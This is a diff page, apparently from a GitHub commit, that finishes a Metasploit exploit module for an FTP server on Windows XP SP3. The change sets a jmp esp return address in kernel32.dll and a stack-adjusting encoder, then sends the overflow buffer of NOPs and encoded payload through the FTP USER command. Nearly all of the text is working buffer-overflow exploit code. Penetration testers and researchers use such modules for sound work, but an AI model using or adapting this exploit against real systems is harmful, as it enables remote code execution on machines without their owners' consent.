File tree Expand file tree Collapse file tree 1 file changed +7
-13
lines changed
modules/exploits/windows/ftp Expand file tree Collapse file tree 1 file changed +7
-13
lines changed Original file line number Diff line number Diff line change @@ -33,28 +33,22 @@ def initialize(info = {})
33
33
'Privileged' => false ,
34
34
'Payload' =>
35
35
{
36
- 'Space' => 500 ,
36
+ 'Space' => 440 ,
37
37
'DisableNops' => true ,
38
38
'BadChars' => "\x00 \x0a \x0d " ,
39
- #'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
40
- 'StackAdjustment' => -3500
39
+ 'PrependEncoder' => "\x81 \xc4 \x54 \xf2 \xff \xff " # Stack adjustment # add esp, -3500
41
40
} ,
42
- 'Targets' =>
41
+ 'Targets' =>
43
42
[
44
43
[ 'Windows XP SP3' ,
45
44
{
46
- 'Ret' => 0x7cb41020 , # jmp esp
47
- #'Ret' => 0xDEADBEEF,
45
+ 'Ret' => 0x7c83c2c5 , # jmp esp kernel32.dll
48
46
'Offset' => 230
49
47
}
50
48
] ,
51
49
] ,
52
50
'DefaultTarget' => 0 ,
53
51
'DisclosureDate' => 'Jun 12 2012' ) )
54
- register_options (
55
- [
56
- #OptAddress.new('SOURCEIP', [false, 'The local client address'])
57
- ] , self . class )
58
52
end
59
53
60
54
def check
@@ -71,9 +65,9 @@ def exploit
71
65
connect
72
66
buf = rand_text ( target [ 'Offset' ] )
73
67
buf << [ target [ 'Ret' ] ] . pack ( 'V' )
74
- # buf << payload.encoded
75
- raw_send ( "USER #{ buf } \r \n " )
76
- # send_user(buf)
68
+ buf << make_nops ( 12 )
69
+ buf << payload . encoded
70
+ send_user ( buf )
77
71
disconnect
78
72
end
79
73
You can’t perform that action at this time.
0 commit comments